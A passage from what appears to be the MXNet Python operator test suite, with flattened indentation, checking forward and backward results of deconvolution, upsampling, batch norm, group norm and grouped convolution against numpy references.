assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
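# Sketch: the check above works because Deconvolution is the adjoint (transpose)
# of Convolution: if convolution computes y = C.dot(x) for a matrix C assembled
# from the kernel, deconvolution with the same kernel computes C.T.dot(y).
# `_sketch_conv_as_matrix` is an illustrative 1-D, stride-1, 'same'-padded
# numpy-only construction of that matrix, not invoked by the test suite.
def _sketch_conv_as_matrix(kernel, n):
    pad = len(kernel) // 2
    C = np.zeros((n, n))
    for i in range(n):
        for j, w in enumerate(kernel):
            col = i + j - pad
            if 0 <= col < n:
                C[i, col] = w
    return C  # conv(x) == C.dot(x) and deconv(y) == C.T.dot(y) under these assumptions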
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
        # Bilinear upsampling takes exactly one data and one weight input;
        # the multi-input mode of UpSampling does not apply here.
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
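# _init_bilinear above fills the weight with a separable tent (triangle) filter:
# for scale f the 1-D profile is 1 - |x / f - c| with c = (2f - 1 - f % 2) / (2f).
# For example, f = 2 gives kernel size 2 * 2 - 2 % 2 = 4, c = 0.75 and 1-D taps
# [0.25, 0.75, 0.75, 0.25]; the 2-D kernel is the outer product of that profile
# with itself.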
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
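# The manual gradients in _test_batchnorm_impl are the standard batch-norm
# backward pass. With m elements per channel, mu = mean(x), v = var(x) and
# x_hat = (x - mu) / sqrt(v + eps):
#   dL/dv     = sum(dy * gamma * (x - mu)) * (-1/2) * (v + eps)^(-3/2)
#   dL/dmu    = -sum(dy * gamma) / sqrt(v + eps) - 2 * dL/dv * mean(x - mu)
#   dL/dx     = dy * gamma / sqrt(v + eps) + dL/dv * 2 * (x - mu) / m + dL/dmu / m
#   dL/dgamma = sum(dy * x_hat)    dL/dbeta = sum(dy)
# which is exactly what dvar, dmean, dX, dW and db compute above.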
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, num_groups, 1, 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
        return out.reshape(data.shape), mean, std  # avoid relying on the enclosing dshape
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, num_groups, 1, 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
x_hat_grad = ograd * gamma
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_groups,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
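# Two limiting cases give a quick sanity check of the reference above: with
# num_groups == 1, np_groupnorm reduces to layer norm over (C, H, W), and with
# num_groups == num_channels it reduces to instance norm; the random num_groups
# here exercises the general case in between.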
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
